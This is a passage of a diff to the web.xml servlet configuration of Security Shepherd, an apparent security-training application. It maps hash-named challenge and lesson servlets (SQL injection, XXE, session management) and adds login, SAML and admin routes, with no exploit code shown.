-        <servlet-name>/challenges/t193c6634f049bcf65cdcac72269eeac25dbb2a6887bdb38873e57d0ef447bc3</servlet-name>
-        <servlet-class>servlets.module.challenge.SessionManagement3</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/challenges/t193c6634f049bcf65cdcac72269eeac25dbb2a6887bdb38873e57d0ef447bc3</servlet-name>
-        <url-pattern>/challenges/t193c6634f049bcf65cdcac72269eeac25dbb2a6887bdb38873e57d0ef447bc3</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/challenges/b467dbe3cd61babc0ec599fd0c67e359e6fe04e8cdc618d537808cbb693fee8a</servlet-name>
-        <servlet-class>servlets.module.challenge.SessionManagement3ChangePassword</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/challenges/b467dbe3cd61babc0ec599fd0c67e359e6fe04e8cdc618d537808cbb693fee8a</servlet-name>
-        <url-pattern>/challenges/b467dbe3cd61babc0ec599fd0c67e359e6fe04e8cdc618d537808cbb693fee8a</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/lessons/fdb94122d0f032821019c7edf09dc62ea21e25ca619ed9107bcc50e4a8dbc100</servlet-name>
-        <servlet-class>servlets.module.lesson.DirectObjectLesson</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/lessons/fdb94122d0f032821019c7edf09dc62ea21e25ca619ed9107bcc50e4a8dbc100</servlet-name>
-        <url-pattern>/lessons/fdb94122d0f032821019c7edf09dc62ea21e25ca619ed9107bcc50e4a8dbc100</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/challenges/o9a450a64cc2a196f55878e2bd9a27a72daea0f17017253f87e7ebd98c71c98c</servlet-name>
-        <servlet-class>servlets.module.challenge.DirectObject1</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/challenges/o9a450a64cc2a196f55878e2bd9a27a72daea0f17017253f87e7ebd98c71c98c</servlet-name>
-        <url-pattern>/challenges/o9a450a64cc2a196f55878e2bd9a27a72daea0f17017253f87e7ebd98c71c98c</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/challenges/vc9b78627df2c032ceaf7375df1d847e47ed7abac2a4ce4cb6086646e0f313a4</servlet-name>
-        <servlet-class>servlets.module.challenge.DirectObject2</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/challenges/vc9b78627df2c032ceaf7375df1d847e47ed7abac2a4ce4cb6086646e0f313a4</servlet-name>
-        <url-pattern>/challenges/vc9b78627df2c032ceaf7375df1d847e47ed7abac2a4ce4cb6086646e0f313a4</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/challenges/1feccf2205b4c5ddf743630b46aece3784d61adc56498f7603ccd7cb8ae92629</servlet-name>
-        <servlet-class>servlets.module.challenge.SqlInjection4</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/challenges/1feccf2205b4c5ddf743630b46aece3784d61adc56498f7603ccd7cb8ae92629</servlet-name>
-        <url-pattern>/challenges/1feccf2205b4c5ddf743630b46aece3784d61adc56498f7603ccd7cb8ae92629</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/challenges/8edf0a8ed891e6fef1b650935a6c46b03379a0eebab36afcd1d9076f65d4ce62</servlet-name>
-        <servlet-class>servlets.module.challenge.SqlInjection5</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/challenges/8edf0a8ed891e6fef1b650935a6c46b03379a0eebab36afcd1d9076f65d4ce62</servlet-name>
-        <url-pattern>/challenges/8edf0a8ed891e6fef1b650935a6c46b03379a0eebab36afcd1d9076f65d4ce62</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/challenges/8edf0a8ed891e6fef1b650935a6c46b03379a0eebab36afcd1d9076f65d4ce62CouponCheck
-        </servlet-name>
-        <servlet-class>servlets.module.challenge.SqlInjection5CouponCheck</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/challenges/8edf0a8ed891e6fef1b650935a6c46b03379a0eebab36afcd1d9076f65d4ce62CouponCheck
-        </servlet-name>
-        <url-pattern>/challenges/8edf0a8ed891e6fef1b650935a6c46b03379a0eebab36afcd1d9076f65d4ce62CouponCheck
-        </url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/challenges/8edf0a8ed891e6fef1b650935a6c46b03379a0eebab36afcd1d9076f65d4ce62VipCouponCheck
-        </servlet-name>
-        <servlet-class>servlets.module.challenge.SqlInjection5VipCheck</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/challenges/8edf0a8ed891e6fef1b650935a6c46b03379a0eebab36afcd1d9076f65d4ce62VipCouponCheck
-        </servlet-name>
-        <url-pattern>/challenges/8edf0a8ed891e6fef1b650935a6c46b03379a0eebab36afcd1d9076f65d4ce62VipCouponCheck
-        </url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/challenges/d0e12e91dafdba4825b261ad5221aae15d28c36c7981222eb59f7fc8d8f212a2</servlet-name>
-        <servlet-class>servlets.module.challenge.SqlInjection6</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/challenges/d0e12e91dafdba4825b261ad5221aae15d28c36c7981222eb59f7fc8d8f212a2</servlet-name>
-        <url-pattern>/challenges/d0e12e91dafdba4825b261ad5221aae15d28c36c7981222eb59f7fc8d8f212a2</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/challenges/8c2dd7e9818e5c6a9f8562feefa002dc0e455f0e92c8a46ab0cf519b1547eced</servlet-name>
-        <servlet-class>servlets.module.challenge.SqlInjection7</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/challenges/8c2dd7e9818e5c6a9f8562feefa002dc0e455f0e92c8a46ab0cf519b1547eced</servlet-name>
-        <url-pattern>/challenges/8c2dd7e9818e5c6a9f8562feefa002dc0e455f0e92c8a46ab0cf519b1547eced</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/challenges/4a1bc73dd68f64107db3bbc7ee74e3f1336d350c4e1e51d4eda5b52dddf86c992</servlet-name>
-        <servlet-class>servlets.module.challenge.UrlAccess1Admin</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/challenges/4a1bc73dd68f64107db3bbc7ee74e3f1336d350c4e1e51d4eda5b52dddf86c992</servlet-name>
-        <url-pattern>/challenges/4a1bc73dd68f64107db3bbc7ee74e3f1336d350c4e1e51d4eda5b52dddf86c992</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/challenges/4a1bc73dd68f64107db3bbc7ee74e3f1336d350c4e1e51d4eda5b52dddf86c99</servlet-name>
-        <servlet-class>servlets.module.challenge.UrlAccess1</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/challenges/4a1bc73dd68f64107db3bbc7ee74e3f1336d350c4e1e51d4eda5b52dddf86c99</servlet-name>
-        <url-pattern>/challenges/4a1bc73dd68f64107db3bbc7ee74e3f1336d350c4e1e51d4eda5b52dddf86c99</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/challenges/278fa30ee727b74b9a2522a5ca3bf993087de5a0ac72adff216002abf79146fahghghmin
-        </servlet-name>
-        <servlet-class>servlets.module.challenge.UrlAccess2Admin</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/challenges/278fa30ee727b74b9a2522a5ca3bf993087de5a0ac72adff216002abf79146fahghghmin
-        </servlet-name>
-        <url-pattern>/challenges/278fa30ee727b74b9a2522a5ca3bf993087de5a0ac72adff216002abf79146fahghghmin</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/challenges/278fa30ee727b74b9a2522a5ca3bf993087de5a0ac72adff216002abf79146fa</servlet-name>
-        <servlet-class>servlets.module.challenge.UrlAccess2</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/challenges/278fa30ee727b74b9a2522a5ca3bf993087de5a0ac72adff216002abf79146fa</servlet-name>
-        <url-pattern>/challenges/278fa30ee727b74b9a2522a5ca3bf993087de5a0ac72adff216002abf79146fa</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/challenges/e40333fc2c40b8e0169e433366350f55c77b82878329570efa894838980de5b4</servlet-name>
-        <servlet-class>servlets.module.challenge.UrlAccess3</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/challenges/e40333fc2c40b8e0169e433366350f55c77b82878329570efa894838980de5b4</servlet-name>
-        <url-pattern>/challenges/e40333fc2c40b8e0169e433366350f55c77b82878329570efa894838980de5b4</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/challenges/e40333fc2c40b8e0169e433366350f55c77b82878329570efa894838980de5b4UserList
-        </servlet-name>
-        <servlet-class>servlets.module.challenge.UrlAccess3UserList</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/challenges/e40333fc2c40b8e0169e433366350f55c77b82878329570efa894838980de5b4UserList
-        </servlet-name>
-        <url-pattern>/challenges/e40333fc2c40b8e0169e433366350f55c77b82878329570efa894838980de5b4UserList</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/challenges/2da053b4afb1530a500120a49a14d422ea56705a7e3fc405a77bc269948ccae1</servlet-name>
-        <servlet-class>servlets.module.challenge.BrokenCrypto3</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/challenges/2da053b4afb1530a500120a49a14d422ea56705a7e3fc405a77bc269948ccae1</servlet-name>
-        <url-pattern>/challenges/2da053b4afb1530a500120a49a14d422ea56705a7e3fc405a77bc269948ccae1</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/challenges/b927fc4d8c9f70a78f8b6fc46a0cc18533a88b2363054a1f391fe855954d12f9</servlet-name>
-        <servlet-class>servlets.module.challenge.BrokenCrypto4</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/challenges/b927fc4d8c9f70a78f8b6fc46a0cc18533a88b2363054a1f391fe855954d12f9</servlet-name>
-        <url-pattern>/challenges/b927fc4d8c9f70a78f8b6fc46a0cc18533a88b2363054a1f391fe855954d12f9</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/challenges/ec43ae137b8bf7abb9c85a87cf95c23f7fadcf08a092e05620c9968bd60fcba6</servlet-name>
-        <servlet-class>servlets.module.challenge.SessionManagement4</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/challenges/ec43ae137b8bf7abb9c85a87cf95c23f7fadcf08a092e05620c9968bd60fcba6</servlet-name>
-        <url-pattern>/challenges/ec43ae137b8bf7abb9c85a87cf95c23f7fadcf08a092e05620c9968bd60fcba6</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/challenges/7aed58f3a00087d56c844ed9474c671f8999680556c127a19ee79fa5d7a132e1</servlet-name>
-        <servlet-class>servlets.module.challenge.SessionManagement5</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/challenges/7aed58f3a00087d56c844ed9474c671f8999680556c127a19ee79fa5d7a132e1</servlet-name>
-        <url-pattern>/challenges/7aed58f3a00087d56c844ed9474c671f8999680556c127a19ee79fa5d7a132e1</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/challenges/7aed58f3a00087d56c844ed9474c671f8999680556c127a19ee79fa5d7a132e1SendToken
-        </servlet-name>
-        <servlet-class>servlets.module.challenge.SessionManagement5SetToken</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/challenges/7aed58f3a00087d56c844ed9474c671f8999680556c127a19ee79fa5d7a132e1SendToken
-        </servlet-name>
-        <url-pattern>/challenges/7aed58f3a00087d56c844ed9474c671f8999680556c127a19ee79fa5d7a132e1SendToken</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/challenges/7aed58f3a00087d56c844ed9474c671f8999680556c127a19ee79fa5d7a132e1ChangePass
-        </servlet-name>
-        <servlet-class>servlets.module.challenge.SessionManagement5ChangePassword</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/challenges/7aed58f3a00087d56c844ed9474c671f8999680556c127a19ee79fa5d7a132e1ChangePass
-        </servlet-name>
-        <url-pattern>/challenges/7aed58f3a00087d56c844ed9474c671f8999680556c127a19ee79fa5d7a132e1ChangePass
-        </url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/challenges/b5e1020e3742cf2c0880d4098146c4dde25ebd8ceab51807bad88ff47c316ece</servlet-name>
-        <servlet-class>servlets.module.challenge.SessionManagement6</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/challenges/b5e1020e3742cf2c0880d4098146c4dde25ebd8ceab51807bad88ff47c316ece</servlet-name>
-        <url-pattern>/challenges/b5e1020e3742cf2c0880d4098146c4dde25ebd8ceab51807bad88ff47c316ece</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/challenges/b5e1020e3742cf2c0880d4098146c4dde25ebd8ceab51807bad88ff47c316eceSecretQuestion
-        </servlet-name>
-        <servlet-class>servlets.module.challenge.SessionManagement6SecretQuestion</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/challenges/b5e1020e3742cf2c0880d4098146c4dde25ebd8ceab51807bad88ff47c316eceSecretQuestion
-        </servlet-name>
-        <url-pattern>/challenges/b5e1020e3742cf2c0880d4098146c4dde25ebd8ceab51807bad88ff47c316eceSecretQuestion
-        </url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/challenges/269d55bc0e0ff635dcaeec8533085e5eae5d25e8646dcd4b05009353c9cf9c80</servlet-name>
-        <servlet-class>servlets.module.challenge.SessionManagement7</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/challenges/269d55bc0e0ff635dcaeec8533085e5eae5d25e8646dcd4b05009353c9cf9c80</servlet-name>
-        <url-pattern>/challenges/269d55bc0e0ff635dcaeec8533085e5eae5d25e8646dcd4b05009353c9cf9c80</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/challenges/269d55bc0e0ff635dcaeec8533085e5eae5d25e8646dcd4b05009353c9cf9c80SecretQuestion
-        </servlet-name>
-        <servlet-class>servlets.module.challenge.SessionManagement7SecretQuestion</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/challenges/269d55bc0e0ff635dcaeec8533085e5eae5d25e8646dcd4b05009353c9cf9c80SecretQuestion
-        </servlet-name>
-        <url-pattern>/challenges/269d55bc0e0ff635dcaeec8533085e5eae5d25e8646dcd4b05009353c9cf9c80SecretQuestion
-        </url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/challenges/714d8601c303bbef8b5cabab60b1060ac41f0d96f53b6ea54705bb1ea4316334</servlet-name>
-        <servlet-class>servlets.module.challenge.SessionManagement8</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/challenges/714d8601c303bbef8b5cabab60b1060ac41f0d96f53b6ea54705bb1ea4316334</servlet-name>
-        <url-pattern>/challenges/714d8601c303bbef8b5cabab60b1060ac41f0d96f53b6ea54705bb1ea4316334</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/challenges/ca0e89caf3c50dbf9239a0b3c6f6c17869b2a1e2edc3aa6f029fd30925d66c7e</servlet-name>
-        <servlet-class>servlets.module.challenge.PoorValidation1</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/challenges/ca0e89caf3c50dbf9239a0b3c6f6c17869b2a1e2edc3aa6f029fd30925d66c7e</servlet-name>
-        <url-pattern>/challenges/ca0e89caf3c50dbf9239a0b3c6f6c17869b2a1e2edc3aa6f029fd30925d66c7e</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/challenges/20e8c4bb50180fed9c1c8d1bf6af5eac154e97d3ce97e43257c76e73e3bbe5d5</servlet-name>
-        <servlet-class>servlets.module.challenge.PoorValidation2</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/challenges/20e8c4bb50180fed9c1c8d1bf6af5eac154e97d3ce97e43257c76e73e3bbe5d5</servlet-name>
-        <url-pattern>/challenges/20e8c4bb50180fed9c1c8d1bf6af5eac154e97d3ce97e43257c76e73e3bbe5d5</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/lessons/4d8d50a458ca5f1f7e2506dd5557ae1f7da21282795d0ed86c55fefe41eb874f</servlet-name>
-        <servlet-class>servlets.module.lesson.PoorValidationLesson</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/lessons/4d8d50a458ca5f1f7e2506dd5557ae1f7da21282795d0ed86c55fefe41eb874f</servlet-name>
-        <url-pattern>/lessons/4d8d50a458ca5f1f7e2506dd5557ae1f7da21282795d0ed86c55fefe41eb874f</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/lessons/fe04648f43cdf2d523ecf1675f1ade2cde04a7a2e9a7f1a80dbb6dc9f717c833</servlet-name>
-        <servlet-class>servlets.module.lesson.SecurityMisconfigLesson</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/lessons/fe04648f43cdf2d523ecf1675f1ade2cde04a7a2e9a7f1a80dbb6dc9f717c833</servlet-name>
-        <url-pattern>/lessons/fe04648f43cdf2d523ecf1675f1ade2cde04a7a2e9a7f1a80dbb6dc9f717c833</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/challenges/c4285bbc6734a10897d672c1ed3dd9417e0530a4e0186c27699f54637c7fb5d4</servlet-name>
-        <servlet-class>servlets.module.challenge.SecurityMisconfigStealTokens</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/challenges/c4285bbc6734a10897d672c1ed3dd9417e0530a4e0186c27699f54637c7fb5d4</servlet-name>
-        <url-pattern>/challenges/c4285bbc6734a10897d672c1ed3dd9417e0530a4e0186c27699f54637c7fb5d4</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/challenges/1f0935baec6ba69d79cfb2eba5fdfa6ac5d77fadee08585eb98b130ec524d00c</servlet-name>
-        <servlet-class>servlets.module.challenge.DirectObjectBankLogin</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/challenges/1f0935baec6ba69d79cfb2eba5fdfa6ac5d77fadee08585eb98b130ec524d00c</servlet-name>
-        <url-pattern>/challenges/1f0935baec6ba69d79cfb2eba5fdfa6ac5d77fadee08585eb98b130ec524d00c</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/challenges/1f0935baec6ba69d79cfb2eba5fdfa6ac5d77fadee08585eb98b130ec524d00cReg</servlet-name>
-        <servlet-class>servlets.module.challenge.DirectObjectBankRegistration</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/challenges/1f0935baec6ba69d79cfb2eba5fdfa6ac5d77fadee08585eb98b130ec524d00cReg</servlet-name>
-        <url-pattern>/challenges/1f0935baec6ba69d79cfb2eba5fdfa6ac5d77fadee08585eb98b130ec524d00cReg</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/challenges/1f0935baec6ba69d79cfb2eba5fdfa6ac5d77fadee08585eb98b130ec524d00cCurrentBalance
-        </servlet-name>
-        <servlet-class>servlets.module.challenge.DirectObjectBankCurrentBalance</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/challenges/1f0935baec6ba69d79cfb2eba5fdfa6ac5d77fadee08585eb98b130ec524d00cCurrentBalance
-        </servlet-name>
-        <url-pattern>/challenges/1f0935baec6ba69d79cfb2eba5fdfa6ac5d77fadee08585eb98b130ec524d00cCurrentBalance
-        </url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/challenges/1f0935baec6ba69d79cfb2eba5fdfa6ac5d77fadee08585eb98b130ec524d00cTransfer
-        </servlet-name>
-        <servlet-class>servlets.module.challenge.DirectObjectBankTransfer</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/challenges/1f0935baec6ba69d79cfb2eba5fdfa6ac5d77fadee08585eb98b130ec524d00cTransfer
-        </servlet-name>
-        <url-pattern>/challenges/1f0935baec6ba69d79cfb2eba5fdfa6ac5d77fadee08585eb98b130ec524d00cTransfer</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/challenges/1f0935baec6ba69d79cfb2eba5fdfa6ac5d77fadee08585eb98b130ec524d00cLogout</servlet-name>
-        <servlet-class>servlets.module.challenge.DirectObjectBankLogout</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/challenges/1f0935baec6ba69d79cfb2eba5fdfa6ac5d77fadee08585eb98b130ec524d00cLogout</servlet-name>
-        <url-pattern>/challenges/1f0935baec6ba69d79cfb2eba5fdfa6ac5d77fadee08585eb98b130ec524d00cLogout</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/challenges/d63c2fb5da9b81ca26237f1308afe54491d1bacf9fffa0b21a072b03c5bafe66</servlet-name>
-        <servlet-class>servlets.module.challenge.NoSqlInjection1</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/challenges/d63c2fb5da9b81ca26237f1308afe54491d1bacf9fffa0b21a072b03c5bafe66</servlet-name>
-        <url-pattern>/challenges/d63c2fb5da9b81ca26237f1308afe54491d1bacf9fffa0b21a072b03c5bafe66</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/challenges/8c3c35c30cdbbb73b7be3a4f8587aa9d88044dc43e248984a252c6e861f673d4</servlet-name>
-        <servlet-class>servlets.module.challenge.SqlInjectionEscaping</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/challenges/8c3c35c30cdbbb73b7be3a4f8587aa9d88044dc43e248984a252c6e861f673d4</servlet-name>
-        <url-pattern>/challenges/8c3c35c30cdbbb73b7be3a4f8587aa9d88044dc43e248984a252c6e861f673d4</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/challenges/7edcbc1418f11347167dabb69fcb54137960405da2f7a90a0684f86c4d45a2e7</servlet-name>
-        <servlet-class>servlets.module.challenge.SqlInjectionStoredProcedure</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/challenges/7edcbc1418f11347167dabb69fcb54137960405da2f7a90a0684f86c4d45a2e7</servlet-name>
-        <url-pattern>/challenges/7edcbc1418f11347167dabb69fcb54137960405da2f7a90a0684f86c4d45a2e7</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/challenges/9e5ed059b23632c8801d95621fa52071b2eb211d8c044dde6d2f4b89874a7bc4</servlet-name>
-        <servlet-class>servlets.module.challenge.BrokenCryptoHomeMade</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/challenges/9e5ed059b23632c8801d95621fa52071b2eb211d8c044dde6d2f4b89874a7bc4</servlet-name>
-        <url-pattern>/challenges/9e5ed059b23632c8801d95621fa52071b2eb211d8c044dde6d2f4b89874a7bc4</url-pattern>
-    </servlet-mapping>
-
-
-    <servlet>
-        <servlet-name>/challenges/ac8f3f6224b1ea3fb8a0f017aadd0d84013ea2c80e232c980e54dd753700123e</servlet-name>
-        <servlet-class>servlets.module.challenge.XxeChallenge1</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/challenges/ac8f3f6224b1ea3fb8a0f017aadd0d84013ea2c80e232c980e54dd753700123e</servlet-name>
-        <url-pattern>/challenges/ac8f3f6224b1ea3fb8a0f017aadd0d84013ea2c80e232c980e54dd753700123e</url-pattern>
-    </servlet-mapping>
-    <servlet>
-        <servlet-name>/challenges/ac8f3f6224b1ea3fb8a0f017aadd0d84013ea2c80e232c980e54dd753700123e0</servlet-name>
-        <servlet-class>servlets.module.lesson.XxeLesson</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/challenges/ac8f3f6224b1ea3fb8a0f017aadd0d84013ea2c80e232c980e54dd753700123e0</servlet-name>
-        <url-pattern>/challenges/ac8f3f6224b1ea3fb8a0f017aadd0d84013ea2c80e232c980e54dd753700123e0</url-pattern>
-    </servlet-mapping>
-
-
-    <filter>
-        <filter-name>SetupFilter</filter-name>
-        <filter-class>servlets.SetupFilter</filter-class>
-    </filter>
-    <filter-mapping>
-        <filter-name>SetupFilter</filter-name>
-        <url-pattern>/*</url-pattern>
-        <servlet-name>Setup</servlet-name>
-        <dispatcher>REQUEST</dispatcher>
-    </filter-mapping>
+<web-app xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://java.sun.com/xml/ns/javaee" xmlns:web="http://java.sun.com/xml/ns/javaee/web-app_2_5.xsd" xsi:schemaLocation="http://java.sun.com/xml/ns/javaee http://java.sun.com/xml/ns/javaee/web-app_2_5.xsd" id="WebApp_ID" version="2.5">
+
+	<display-name>Security Shepherd</display-name>
+	<welcome-file-list>
+		<welcome-file>index.html</welcome-file>
+		<welcome-file>index.htm</welcome-file>
+		<welcome-file>index.jsp</welcome-file>
+		<welcome-file>default.html</welcome-file>
+		<welcome-file>default.htm</welcome-file>
+		<welcome-file>default.jsp</welcome-file>
+	</welcome-file-list>
+
+	<jsp-config>
+		<jsp-property-group>
+			<url-pattern>*.jsp</url-pattern>
+			<page-encoding>UTF-8</page-encoding>
+		</jsp-property-group>
+	</jsp-config>
+
+	<error-page>
+		<error-code>403</error-code>
+		<location>/serverError.jsp</location>
+	</error-page>
+	<error-page>
+		<error-code>404</error-code>
+		<location>/lostSheep.jsp</location>
+	</error-page>
+	<error-page>
+		<error-code>500</error-code>
+		<location>/serverError.jsp</location>
+	</error-page>
+	<error-page>
+		<exception-type>java.lang.Exception</exception-type>
+		<location>/serverError.jsp</location>
+	</error-page>
+
+	<env-entry>
+		<env-entry-name>java.net.preferipv4stack</env-entry-name>
+		<env-entry-type>java.lang.String</env-entry-type>
+		<env-entry-value>true</env-entry-value>
+	</env-entry>
+
+	<servlet>
+		<servlet-name>/setup</servlet-name>
+		<servlet-class>servlets.Setup</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/setup</servlet-name>
+		<url-pattern>/setup</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/login</servlet-name>
+		<servlet-class>servlets.Login</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/login</servlet-name>
+		<url-pattern>/login</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/ssologin</servlet-name>
+		<servlet-class>servlets.SSOLogin</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/ssologin</servlet-name>
+		<url-pattern>/saml/dologin</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/ssometadata</servlet-name>
+		<servlet-class>servlets.SSOMetadata</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/ssometadata</servlet-name>
+		<url-pattern>/saml/metadata.xml</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/acs</servlet-name>
+		<servlet-class>servlets.ACS</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/acs</servlet-name>
+		<url-pattern>/saml/acs</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/sls</servlet-name>
+		<servlet-class>servlets.SLS</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/sls</servlet-name>
+		<url-pattern>/saml/sls</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/mobileLogin</servlet-name>
+		<servlet-class>servlets.MobileLogin</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/mobileLogin</servlet-name>
+		<url-pattern>/mobileLogin</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/register</servlet-name>
+		<servlet-class>servlets.Register</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/register</servlet-name>
+		<url-pattern>/register</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/refreshMenu</servlet-name>
+		<servlet-class>servlets.module.RefreshMenu</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/refreshMenu</servlet-name>
+		<url-pattern>/refreshMenu</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/logout</servlet-name>
+		<servlet-class>servlets.Logout</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/logout</servlet-name>
+		<url-pattern>/logout</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/passwordChange</servlet-name>
+		<servlet-class>servlets.ChangePassword</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/passwordChange</servlet-name>
+		<url-pattern>/passwordChange</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/usernameChange</servlet-name>
+		<servlet-class>servlets.ChangeUsername</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/usernameChange</servlet-name>
+		<url-pattern>/usernameChange</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/createNewAdmin</servlet-name>
+		<servlet-class>servlets.admin.userManagement.CreateNewAdmin</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/createNewAdmin</servlet-name>
+		<url-pattern>/createNewAdmin</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
